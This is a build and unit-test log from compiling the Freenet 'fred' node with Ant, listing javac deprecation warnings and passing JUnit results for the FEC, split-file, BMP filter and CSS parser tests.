    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:17: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:30: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/test/freenet/client/CodeTest.java:43: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]             Assert.assertEquals(src[i], repair[i]);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/client/async/SplitFileInserterStorageTest.java:664: warning: [deprecation] fill(RandomAccessBuffer,Random,long,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(thing, random, 0, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/client/async/ClientRequestSelectorTest.java:227: warning: [deprecation] fill(RandomAccessBuffer,Random,long,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(thing, random, 0, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/client/async/ClientRequestSelectorTest.java:231: warning: [serial] serializable class ClientRequestSelectorTest.NullSendableInsert has no definition of serialVersionUID
    [javac]     class NullSendableInsert extends SendableInsert {
    [javac]     ^
    [javac] /home/arne/fred-work/test/freenet/client/async/PersistentJobRunnerImplTest.java:162: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         jobRunner.queue(w, NativeThread.NORM_PRIORITY);
    [javac]                                        ^
    [javac] /home/arne/fred-work/test/freenet/client/async/PersistentJobRunnerImplTest.java:189: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         }, NativeThread.NORM_PRIORITY);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/client/async/SplitFileFetcherStorageTest.java:571: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(b, random, size);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:24: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]             BucketTools.fill(input, random, 65536);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:35: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]             BucketTools.fill(input, random, 65536);
    [javac]                        ^
    [javac] /home/arne/fred-work/test/freenet/crypt/AEADStreamsTest.java:45: warning: [deprecation] fill(Bucket,Random,long) in BucketTools has been deprecated
    [javac]         BucketTools.fill(input, random, 512*1024);
    [javac]                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:61: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]         PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:82: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:120: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             PCFBMode ctr = PCFBMode.create(cipher);
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:127: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             ctr = PCFBMode.create(cipher);
    [javac]                           ^
    [javac] /home/arne/fred-work/test/freenet/crypt/PCFBModeTest.java:137: warning: [deprecation] create(BlockCipher) in PCFBMode has been deprecated
    [javac]             ctr = PCFBMode.create(cipher);
    [javac]                           ^
    [javac] /home/arne/fred-work/test/freenet/crypt/ciphers/RijndaelTest.java:2010: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 Closer.close(is);
    [javac]                 ^
    [javac] /home/arne/fred-work/test/freenet/store/caching/SleepingFreenetStore.java:11: warning: [dep-ann] deprecated item is not annotated with @Deprecated
    [javac] public class SleepingFreenetStore<T extends StorableBlock> extends ProxyFreenetStore<T> {
    [javac]        ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:9: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.6.0_32"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:10: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.6"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:11: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertTrue(JVMVersion.isTooOld("1.5"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:15: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.7.0_65"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:16: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.7"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:17: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.8.0_9"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:18: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld("1.10"));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/JVMVersionTest.java:22: warning: [deprecation] Assert in junit.framework has been deprecated
    [javac]         Assert.assertFalse(JVMVersion.isTooOld(null));
    [javac]         ^
    [javac] /home/arne/fred-work/test/freenet/support/ListUtilsTest.java:100: warning: [serial] serializable class NotRandomAlwaysTop has no definition of serialVersionUID
    [javac]     static class NotRandomAlwaysTop extends Random {
    [javac]            ^
    [javac] /home/arne/fred-work/test/freenet/support/ListUtilsTest.java:107: warning: [serial] serializable class NotRandomAlwaysZero has no definition of serialVersionUID
    [javac]     static class NotRandomAlwaysZero extends Random {
    [javac]            ^
    [javac] /home/arne/fred-work/test/freenet/support/MemoryLimitedJobRunnerTest.java:28: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             return NativeThread.NORM_PRIORITY;
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/support/MemoryLimitedJobRunnerTest.java:210: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             return NativeThread.NORM_PRIORITY;
    [javac]                                ^
    [javac] /home/arne/fred-work/test/freenet/support/PrioritizedSerialExecutorTest.java:54: warning: [deprecation] MAX_PRIORITY in NativeThread has been deprecated
    [javac]         exec = new PrioritizedSerialExecutor(NativeThread.MAX_PRIORITY, 10, 5, true);
    [javac]                                                          ^
    [javac] /home/arne/fred-work/test/freenet/support/SerialExecutorTest.java:10: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         SerialExecutor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                              ^
    [javac] /home/arne/fred-work/test/freenet/support/SerialExecutorTest.java:30: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                 return NativeThread.NORM_PRIORITY;
    [javac]                                    ^
    [javac] /home/arne/fred-work/test/freenet/support/SimpleFieldSetTest.java:739: warning: [cast] redundant cast to String
    [javac]             assertTrue(isAKey(SAMPLE_STRING_PAIRS, "", (String)itr.next()));
    [javac]                                                        ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:142: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:143: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:162: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/Bzip2CompressorTest.java:163: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:150: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:151: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:169: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/GzipCompressorTest.java:170: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:159: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorInput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/compress/NewLzmaCompressorTest.java:160: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(decompressorOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketFactoryRAFBase.java:35: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]     private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                            ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketFactoryRAFBase.java:323: warning: [cast] redundant cast to TempBucketFactory.TempBucket
    [javac]             return ((TempFileBucket)(((TempBucket) bucket).getUnderlying())).getFile();
    [javac]                                       ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketTest.java:38: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                                ^
    [javac] /home/arne/fred-work/test/freenet/support/io/TempBucketTest.java:160: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         private Executor exec = new SerialExecutor(NativeThread.NORM_PRIORITY);
    [javac]                                                                ^
    [javac] 56 warnings
     [copy] Copying 84 files to /home/arne/fred-work/build/test/freenet/client/filter/png
     [copy] Copying 15 files to /home/arne/fred-work/build/test/freenet/client/filter/bmp
     [copy] Copying 12 files to /home/arne/fred-work/build/test/freenet/crypt/ciphers/rijndael-gladman-test-data
     [copy] Copying 3 files to /home/arne/fred-work/build/test/freenet/l10n

unit:
    [junit] WARNING: multiple versions of ant detected in path for junit 
    [junit]          jar:file:/usr/share/ant-core/lib/ant.jar!/org/apache/tools/ant/Project.class
    [junit]      and jar:file:/home/arne/.ant/lib/ant.jar!/org/apache/tools/ant/Project.class
    [junit] Running freenet.client.CodeTest
    [junit] Testsuite: freenet.client.CodeTest
    [junit] Attempting to deploy Native FEC for linux-x86_64
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 7,797 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 7,797 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to deploy Native FEC for linux-x86_64
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimpleRev took 3,249 sec
    [junit] Testcase: testBenchmark took 0,007 sec
    [junit] Testcase: testShifted took 3,643 sec
    [junit] Testcase: testSimple took 0,325 sec
    [junit] Running freenet.client.DefaultMIMETypesTest
    [junit] Testsuite: freenet.client.DefaultMIMETypesTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,024 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,024 sec
    [junit] 
    [junit] Testcase: testParams took 0,147 sec
    [junit] Testcase: testFullList took 0,269 sec
    [junit] Running freenet.client.FailureCodeTrackerTest
    [junit] Testsuite: freenet.client.FailureCodeTrackerTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] 
    [junit] Testcase: testSize took 0,102 sec
    [junit] Running freenet.client.FetchContextTest
    [junit] Testsuite: freenet.client.FetchContextTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,586 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,586 sec
    [junit] 
    [junit] Testcase: testPersistence took 0,155 sec
    [junit] Running freenet.client.OnionFECCodecTest
    [junit] Testsuite: freenet.client.OnionFECCodecTest
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 41,276 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 41,276 sec
    [junit] 
    [junit] Testcase: testDecodeNoneDecoded took 2,784 sec
    [junit] Testcase: testDecodeRandomSubset took 30,79 sec
    [junit] Testcase: testDecodeThrowsOnNotPaddedLastBlock took 0,476 sec
    [junit] Testcase: testEncodeThrowsOnNotPaddedLastBlock took 0,027 sec
    [junit] Testcase: testManyDataFewCheck took 0,86 sec
    [junit] Testcase: testDecodeAlreadyDecoded took 0,937 sec
    [junit] Testcase: testManyCheckFewData took 0,763 sec
    [junit] Testcase: testRandomDataCheckCounts took 4,127 sec
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.ClientRequestSelectorTest
    [junit] Testsuite: freenet.client.async.ClientRequestSelectorTest
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi1841931918231409357lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12166485ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12280268ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,736 sec
    [junit] 
    [junit] Testcase: testSmallSplitfileChooseCompletion took 11,444 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.PersistentJobRunnerImplTest
    [junit] Testsuite: freenet.client.async.PersistentJobRunnerImplTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,59 sec
    [junit] 
    [junit] Testcase: testWaitForCheckpoint took 0,052 sec
    [junit] Testcase: testDisabledCheckpointing took 0,014 sec
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Running freenet.client.async.SplitFileFetcherStorageTest
    [junit] Testsuite: freenet.client.async.SplitFileFetcherStorageTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6316287223875696332lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12272226ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12251649ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Blocks: 1 2 5 7 8
    [junit] Blocks: 5 6 7 8
    [junit] Blocks: 0 2 4 5 6 7 8 11 13 15 16 17 18 19
    [junit] Blocks: 0 3 5 7 9 11 17
    [junit] Blocks: 1 4 8 9 10 11 14 15 16 17
    [junit] Tests run: 11, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 193,881 sec
    [junit] 
    [junit] Testcase: testPersistenceReloadThenChooseKey took 11,545 sec
    [junit] Testcase: testWriteReadSegmentKeys took 0,254 sec
    [junit] Testcase: testPersistenceReload took 0,096 sec
    [junit] Testcase: testChooseKeyThreeTries took 0,084 sec
    [junit] Testcase: testPersistenceReloadThenFetch took 0,219 sec
    [junit] Testcase: testPersistenceReloadBetweenChooseKey took 0,159 sec
    [junit] Testcase: testMultiSegment took 3,317 sec
    [junit] Testcase: testChooseKeyCooldown took 0,388 sec
    [junit] Testcase: testPersistenceReloadBetweenFetches took 0,266 sec
    [junit] Testcase: testSingleSegment took 176,969 sec
    [junit] Testcase: testChooseKeyOneTry took 0,093 sec
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Running freenet.client.async.SplitFileInserterStorageTest
    [junit] Testsuite: freenet.client.async.SplitFileInserterStorageTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi5142930070342381907lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 11976766ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12197192ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Tests run: 26, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 226,95 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 11976766ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12197192ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockFailAfterResume took 10,493 sec
    [junit] Testcase: testCancelAltCrossSegment took 7,594 sec
    [junit] Testcase: testSmallSplitfileFailureFatalError took 0,179 sec
    [junit] Testcase: testSmallSplitfileConsecutiveRNFsHackFailure took 0,111 sec
    [junit] Testcase: testEncodeAfterShutdownCrossSegment took 0,003 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockCompletionAfterResume took 0,492 sec
    [junit] Testcase: testPersistentSmallSplitfileWithLastBlockCompletionAfterResume took 0,311 sec
    [junit] Testcase: testSmallSplitfileChooseCooldown took 0,489 sec
    [junit] Testcase: testRoundTripOneBlockSegment took 18,965 sec
    [junit] Testcase: testSmallSplitfileFailureMaxRetries took 0,055 sec
    [junit] Testcase: testSmallSplitfileHasKeys took 0,054 sec
    [junit] Testcase: testSmallSplitfileCompletion took 0,091 sec
    [junit] Testcase: testRepeatedEncodeAfterShutdown took 33,799 sec
    [junit] Testcase: testRoundTripSimple took 73,584 sec
    [junit] Testcase: testResumeCrossSegment took 0,001 sec
    [junit] Testcase: testSmallSplitfileChooseCooldownNotRNF took 0,086 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockCompletion took 0,114 sec
    [junit] Testcase: testSmallSplitfileChooseCompletion took 0,098 sec
    [junit] Testcase: testSmallSplitfileConsecutiveRNFsHack took 0,116 sec
    [junit] Testcase: testCancelAlt took 0,13 sec
    [junit] Testcase: testSmallSplitfileNoLastBlock took 0,053 sec
    [junit] Testcase: testRoundTripDataBlocksOnly took 78,865 sec
    [junit] Testcase: testCancel took 0,317 sec
    [junit] Testcase: testSmallSplitfileWithLastBlock took 0,107 sec
    [junit] Testcase: testRoundTripCrossSegment took 0 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockChooseAfterResume took 0,361 sec
    [junit] Running freenet.client.filter.BMPFilterTest
    [junit] Testsuite: freenet.client.filter.BMPFilterTest
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,687 sec
    [junit] 
    [junit] Testcase: testInvalidImageResolution took 0,983 sec
    [junit] Testcase: testImageSizeCalculationWithPadding took 0,08 sec
    [junit] Testcase: testValidImage took 0,016 sec
    [junit] Testcase: testInvalidNumberOfPlanes took 0,011 sec
    [junit] Testcase: testNotEnoughImageData took 0,006 sec
    [junit] Testcase: testInvalidBitDepth took 0,004 sec
    [junit] Testcase: testImageSizeCalculationWithoutPadding took 0,007 sec
    [junit] Testcase: testInvalidBitmapInfoHeaderSize took 0,008 sec
    [junit] Testcase: testIllegalStartWord took 0,004 sec
    [junit] Testcase: testInvalidOffset took 0,003 sec
    [junit] Testcase: testInvalidCompressionType took 0,004 sec
    [junit] Testcase: testTooShortImage took 0,004 sec
    [junit] Testcase: testNegativeImageWidth took 0,005 sec
    [junit] Testcase: testInvalidImageDataSize took 0,004 sec
    [junit] Running freenet.client.filter.CSSParserTest
    [junit] Testsuite: freenet.client.filter.CSSParserTest
    [junit] CSS3 test0 : h1:nth-of-type(odd) {} -> h1:nth-of-type(odd)
    [junit] CSS3 test1 : tr:nth-child(n+1) {} -> tr:nth-child(n+1)
    [junit] CSS3 test2 : tr:nth-child(+1) {} -> tr:nth-child(+1)
    [junit] CSS3 test3 : tr:nth-child(2n-1) {} -> tr:nth-child(2n-1)
    [junit] CSS3 test4 : tr:nth-child(-2n+1) {} -> tr:nth-child(-2n+1)
    [junit] CSS3 test5 : h1:nth-last-of-type(1) {} -> h1:nth-last-of-type(1)
    [junit] CSS3 test6 : tr:nth-child(1) {} -> tr:nth-child(1)
    [junit] CSS3 test7 : tr:nth-child(even) { background-color: yellow; } -> tr:nth-child(even) { background-color: yellow; }
    [junit] CSS3 test8 : tr:nth-child(n) {} -> tr:nth-child(n)
    [junit] CSS3 test9 : tr:nth-child(-n-1) {} -> tr:nth-child(-n-1)
    [junit] CSS3 test10 : tr:nth-child(-1) {} -> tr:nth-child(-1)
    [junit] CSS3 test11 : tr:nth-child(2n) {} -> tr:nth-child(2n)
    [junit] CSS3 test12 : tr:nth-child(-999999) {} -> tr:nth-child(-999999)
    [junit] CSS3 test13 : tr:nth-child(odd) { background-color: red; } -> tr:nth-child(odd) { background-color: red; }
    [junit] CSS3 test14 : tr:nth-child(10n) {} -> tr:nth-child(10n)
    [junit] CSS3 test15 : h1:nth-of-type(1) {} -> h1:nth-of-type(1)
    [junit] CSS3 test16 : tr:nth-last-child(even) {} -> tr:nth-last-child(even)
    [junit] CSS3 test17 : h1:nth-last-of-type(odd) {} -> h1:nth-last-of-type(odd)
    [junit] CSS3 test18 : tr:nth-child(n-1) {} -> tr:nth-child(n-1)
    [junit] CSS3 test19 : tr:nth-child(10) {} -> tr:nth-child(10)
    [junit] CSS3 test20 : tr:nth-last-child(1) {} -> tr:nth-last-child(1)
    [junit] CSS3 test21 : tr:nth-child(100) {} -> tr:nth-child(100)
    [junit] CSS3 test22 : tr:nth-last-child(odd) {} -> tr:nth-last-child(odd)
    [junit] CSS3 test23 : h1:nth-last-of-type(even) {} -> h1:nth-last-of-type(even)
    [junit] CSS3 test24 : tr:nth-child(-n+1) {} -> tr:nth-child(-n+1)
    [junit] CSS3 test25 : tr:nth-child(999999) {} -> tr:nth-child(999999)
    [junit] CSS3 test26 : tr:nth-child(-n) {} -> tr:nth-child(-n)
    [junit] CSS3 test27 : h1:nth-of-type(even) {} -> h1:nth-of-type(even)
    [junit] CSS3 test28 : tr:nth-child(-2n-1) {} -> tr:nth-child(-2n-1)
    [junit] CSS3 test29 : tr:nth-child(2n+1) {} -> tr:nth-child(2n+1)
    [junit] CSS3 test30 : tr:nth-child(n+10) {} -> tr:nth-child(n+10)
    [junit] CSS3 bad selector test 0
    [junit] CSS3 bad selector test 1
    [junit] CSS3 bad selector test 2
    [junit] CSS3 bad selector test 3
    [junit] CSS3 bad selector test 4
    [junit] CSS3 bad selector test 5
    [junit] CSS3 bad selector test 6
    [junit] CSS3 bad selector test 7
    [junit] CSS3 bad selector test 8
    [junit] CSS3 bad selector test 9
    [junit] CSS3 bad selector test 10
    [junit] CSS3 bad selector test 11
    [junit] CSS3 bad selector test 12
    [junit] CSS3 bad selector test 13
    [junit] CSS3 bad selector test 14
    [junit] CSS3 bad selector test 15
    [junit] CSS3 bad selector test 16
    [junit] CSS3 bad selector test 17
    [junit] CSS3 bad selector test 18
    [junit] CSS3 bad selector test 19
    [junit] CSS3 bad selector test 20
    [junit] CSS3 bad selector test 21
    [junit] CSS3 bad selector test 22
    [junit] CSS3 bad selector test 23
    [junit] CSS3 bad selector test 24
    [junit] CSS3 bad selector test 25
    [junit] CSS3 bad selector test 26
    [junit] CSS3 bad selector test 27
    [junit] CSS3 bad selector test 28
    [junit] CSS3 bad selector test 29
    [junit] Test 0 : div * p { color: blue;} -> div * p { color: blue;}
    [junit] Test 1 : p.marine.pastoral { color: green } -> p.marine.pastoral
    [junit] Test 2 : h1[foo="bar+bar"] {} -> h1[foo="bar+bar"]
    [junit] Test 3 : p:first-child em { font-weight : bold } -> p:first-child em { font-weight: bold }
    [junit] Test 4 : a:focus:hover { background: white;} -> a:focus:hover { background: white;}
    [junit] Test 5 : span[class=example] { color: blue; } -> span[class=example] { color: blue; }
    [junit] Test 6 : div ol>li p { color: green;} -> div ol>li p { color: green;}
    [junit] Test 7 : h1[foo="bar bar"] {} -> h1[foo="bar bar"]
    [junit] Test 8 : .warning {} -> .warning {}
    [junit] Test 9 : h1#chapter1 {} -> h1#chapter1 {}
    [junit] Test 10 : a.external:visited { color: blue } -> 
    [junit] Test 11 : div > p:FIRST-CHILD { text-indent: 0 } -> div>p:FIRST-CHILD { text-indent: 0 }
    [junit] Test 12 : h1[foo] h2 > p + b { color: green;} -> h1[foo] h2>p+b { color: green;}
    [junit] Test 13 : h1[foo] {} -> h1[foo]
    [junit] Test 14 : * > a:first-child {} -> *>a:first-child {}
    [junit] Test 15 : div p *[href] { color: blue;} -> div p *[href] { color: blue;}
    [junit] Test 16 : h1[foo="\"test\""] {} -> h1[foo="\"test\""] {}
    [junit] Test 17 : h1[foo="hello\202 "] {} -> h1[foo="hello\202 "] {}
    [junit] Test 18 : h1:first-child {} -> h1:first-child
    [junit] Test 19 : h1[foo="bar"] {} -> h1[foo="bar"]
    [junit] Test 20 : a:focus:hover { background: white } -> a:focus:hover { background: white }
    [junit] Test 21 : h1[foo] h2 > p + b:before { color: green;} -> h1[foo] h2>p+b:before { color: green;}
    [junit] Test 22 : #myid {} -> #myid {}
    [junit] Test 23 : h1[foo=bar] {} -> h1[foo=bar] {}
    [junit] Test 24 : td { border-right: hidden; border-bottom: hidden } -> td { border-right: hidden; border-bottom: hidden }
    [junit] Test 25 : h1[foo~="bar"] {} -> h1[foo~="bar"]
    [junit] Test 26 : :link { color: red } -> :link { color: red }
    [junit] Test 27 : span[hello="Cleveland"][goodbye="Columbus"] { color: blue; } -> span[hello="Cleveland"][goodbye="Columbus"] { color: blue; }
    [junit] Test 28 : [lang=fr] {} -> [lang=fr] {}
    [junit] Test 29 : h1[foo|="en"] {} -> h1[foo|="en"]
